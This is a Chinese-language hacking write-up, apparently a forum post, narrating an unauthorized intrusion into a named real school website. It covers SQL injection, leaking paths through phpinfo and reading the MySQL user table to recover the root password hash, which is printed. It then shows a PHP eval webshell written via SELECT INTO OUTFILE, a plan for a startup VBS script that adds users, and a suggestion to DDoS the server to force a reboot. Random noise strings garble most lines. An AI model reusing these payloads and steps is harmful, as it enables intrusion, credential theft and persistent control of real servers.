第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ m d+ n+ l" {; q
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
: u" Q9 }- p+ Z3 \* ?& e B' C
9 ^9 c& k& S; ~
T9 Z: H/ [6 M' _
1 z; ~% e3 E) N) M7 _. `6 t! Y# ]常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
0 h+ @) {& H. e# ?% D$ s* ^. e- {/ B1 `: @+ U5 z# S \' t, }
那么想可以直接写入shell ,getshell有几个条件:- \& N; L% A2 M$ @
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
. K* g. t8 _) w- r7 @! S3 C/ P
试着爆绝对路径: . |/ y2 x( w3 z- {3 U6 H
1./phpMyAdmin/index.php?lang[]=1 / r# r5 G0 h( ~
2./phpMyAdmin/phpinfo.php
9 Y1 A1 K* y3 n$ h4 G3./load_file()
9 G# }; z* ?( N9 y1 |3 S. l% I4./phpmyadmin/themes/darkblue_orange/layout.inc.php
2 s" ~# I$ n& ~5./phpmyadmin/libraries/select_lang.lib.php / k+ ~8 l; N7 d' R
6./phpmyadmin/libraries/lect_lang.lib.php
, _ ]9 ^+ F; E' q7./phpmyadmin/libraries/mcrypt.lib.php ) {( j' L+ o( Q2 z
8./phpmyadmin/libraries/export/xls.php 2 D N* A$ _* |2 v
$ ~+ D# @. d* H; S; a均不行........................... . p$ J" r% w, G1 o$ N6 V
0 E7 H; [& \, z+ B
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
5 d* `1 l7 g- m2 A7 B
% }6 i# N6 y% {. `9 Z权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin " }% i2 F: a: T
! e/ F( E. j& A, J: e, a默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 " p: ~" x' `( ?, Z
2 T" K$ L/ X6 U) A! ]敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
" a Q, P# P7 @7 t' D3 [2 h4 }5 |: K: g/ l- h/ Q0 q3 }5 Z
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell H+ L/ g. x7 u/ ^. V: }
. d& P0 L' j! z! C" I3 K
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 3 a* z% T$ C- H: P7 j& I) b
1 g. w8 L6 |% m' v& l
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
+ u+ M# m: y/ w j' @4 W P
' f X% d. @% ]3 \7 d' I; k成功读到root密码:
1 \2 x2 v2 ?; t# p
) q8 E7 m: Z5 e4 Y17---- r(0072) ! h1 ~: e* n) b3 b# h
18---- o(006f)
5 _# g& r# L T" V+ Y- C19---- o(006f) : ~, D( M" n" [8 g
20---- t(0074) . r9 M9 v# v! ], e3 `) H
21---- *(002a) 7 f2 w; n6 S0 B% M: m
22---- 8(0038) ! |8 o# V& O6 \' B# T, b( r9 ]; H
23---- 2(0032)
k5 `( P7 v# Q. f' ]24---- E(0045) / [) e1 Z# `% W+ o# q% d
25---- 1(0031)
0 @! R) ]; b6 ]3 k26---- C(0043) 7 c* Y' J6 l( Z6 c
27---- 5(0035) " k5 |* V! Q W$ S6 l4 w& O
28---- 8(0038) ; }% S# `4 J7 V1 R
29---- 2(0032)
% e9 p$ }: w) r* |! ~" _30---- 8(0038)
D& {/ B+ o2 t" C7 ?+ ~31---- A(0041) ) Q3 L& F! T7 P: Q% y
32---- 9(0039) - o# ~8 M5 V6 q( }$ {5 I4 K
33---- B(0042) 4 i1 C% m3 i4 w. v3 C; m9 D
34---- 5(0035)
9 n6 \+ @* [6 l/ k$ c! J35---- 4(0034)
r2 W$ T* Y# c7 a* p: A- b* M36---- 8(0038)
. J5 W1 S' W+ E9 @37---- 6(0036) 6 u, Z! f) s! K$ r
38---- 4(0034)
* u# s; m% U# P: G4 I5 o* _39---- 9(0039) 2 I A0 x3 [3 l1 Q0 e( c( ], O
40---- 1(0031)
7 @& }3 P) h8 T$ J- v/ d41---- 1(0031) % M7 m# s) p% _" `$ @) d
42---- 5(0035) 2 ], c2 v' x z* j4 ~
43---- 3(0033)
# B8 ?4 t U7 A6 p8 l44---- 5(0035) U5 p" p2 y" ^2 W# @8 H
45---- 9(0039)
: H* h# U/ |5 j U46---- 8(0038)
* A) l0 Y- w. Z' \: A47---- F(0046)
( _$ G( {( [4 w# w9 q/ S48---- F(0046) - ~- C, V3 F9 J+ S+ N
49---- 4(0034)
& f) \) z- u0 E/ ~- e4 l50---- F(0046)
' P T) J( ]5 x/ \7 q51---- 0(0030)
& X# L) [& ?" S; l7 u m52---- 3(0033)
) k$ A1 r3 D9 O) b1 S53---- 2(0032) 3 @# H% l& G& b7 L( ?- R% C0 v) n
54---- A(0041) % X: M3 d; @" P8 G2 Q4 e
55---- 4(0034) 7 W2 A* R. x4 _
56---- A(0041)
% E* w7 V/ C3 {( I- v( T57---- B(0042)
$ T8 x$ [1 F& T3 F7 a58---- *(0044)
/ |. O' J2 p; j5 x0 a59---- *(0035)
& f: B4 t) G3 j4 G60---- *(0041) - i, `+ U. ]. ]# r
61---- *0032) * g; H/ J& l( V" T* V( \- T, Q! ?
) S& {4 _4 e+ L9 O8 B0 d解密后成功登陆phpmyamin
* F. d9 Q; E! O
* ?- a3 H$ F" g. N6 Q) x; B4 @1 b! L5 X+ r- N3 V
2 C' o+ Q) L l$ }7 T* S
0 m: z6 Q" u; j3 R) j找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' # @9 B4 R5 ~) c- E4 F" k
: b& _8 D$ |8 V# O: Y- u成功执行,拿下shell,菜刀连接: . p. v7 o; S) q
b5 m& k$ }& z3 R0 H& a" M
服务器不支持asp,aspx,php提权无果...................
. K- R* _) C3 Z7 y, L' n3 \$ h- M
, c: u- u3 W* Y5 k但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
+ t5 o! g3 ?/ d0 @4 D服务器上已经有个隐藏帐号了
/ K& S( ]! s& a0 j; K: A% ]别名 administrators
3 ]( t( u0 Q+ J1 o7 n2 g. A注释 管理员对计算机/域有不受限制的完全访问权 7 P4 ~5 w. ?3 v# A) f: Q
成员
& G5 R; o+ o* |' {0 W- P0 e-------------------------------------------------------------------------------
: R3 C; m$ t. T9 s) Jadmin' z% D* V5 p A, Y6 q: e! x d. D( C
Administrator B- o) K# Q k3 u' ]
slipper$3 }7 t' L% b, u v0 I
sqluser
# A- Y8 d4 f/ f; i2 i. x命令成功完成。
$ X- @7 z( T- ~) I2 ?
' m3 `9 g" X: Y2 ~" O1 S服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。- n5 N7 `$ `/ Z% `/ D: @
5 i3 |4 a! H; j; b. E; ]! Qddos服务器重启,不然就只能坐等服务器重启了...............................( z E- E1 o8 M! A0 K
8 H; @* H7 g6 v" I: z( v* S& v
8 v7 n* E* U. Q% y* Y5 m |